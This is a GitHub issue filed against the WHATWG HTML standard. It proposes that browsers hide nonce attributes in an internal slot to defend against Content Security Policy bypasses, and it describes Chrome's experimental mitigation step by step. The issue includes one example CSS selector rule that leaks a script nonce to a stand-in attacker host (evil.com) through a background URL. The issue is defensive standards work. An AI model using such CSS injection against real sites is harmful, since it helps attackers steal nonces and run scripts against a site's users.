Consider hiding nonce content attributes. · Issue #2369 · whatwg/html (original) (raw)

We've seen some recent attacks on CSP which rely on the ability to exfiltrate nonce data via various mechanisms that can grab data from content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attacker's server for reuse (script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); }). Chrome is experimenting with some changes that might help mitigate this risk, which seems fairly robust:

  1. When parsing a <script> tag with a nonce attribute, copy the attribute's value in to an internal [[nonce]] slot on the element, and then overwrite the content attribute's value with the empty string.
  2. When changing the value of the content attribute (e.g. via setAttributeValue), update the value of the internal [[nonce]] slot.
  3. When running a script, pass in the [[nonce]] slot's value rather than the content attribute's value as the cryptographic nonce metadata to be used when fetching the script resource.
  4. The nonce IDL attribute on HTMLScriptElement's getter returns the value of the internal [[nonce]] slot. Its setter sets the internal [[nonce]] slot's value. This enables JavaScript to retain access to the nonce value to manually propagate trust to scripts they require.

We'd want to do the above for every element that supports a nonce attribute. Some folks on the team suggest that it might actually be nice to extend this behavior to every element. That is, move this up to Element (or Node?) rather than special-casing the three elements that currently support nonces. If we extend nonce support to other resource types (as I'm told Mozilla has already done with images?), this might be more reasonable than special-casing even more elements.

The tests associated with https://codereview.chromium.org/2628733005 and https://codereview.chromium.org/2644143005 might help explain the expectations.

@arturjanc, @mikispag, and @lweichselbaum have opinions. I hope folks like @annevk, @mozfreddyb, @ckerschb, @dveditz, @hillbrad, @devd, @johnwilander, and @teddink also have opinions.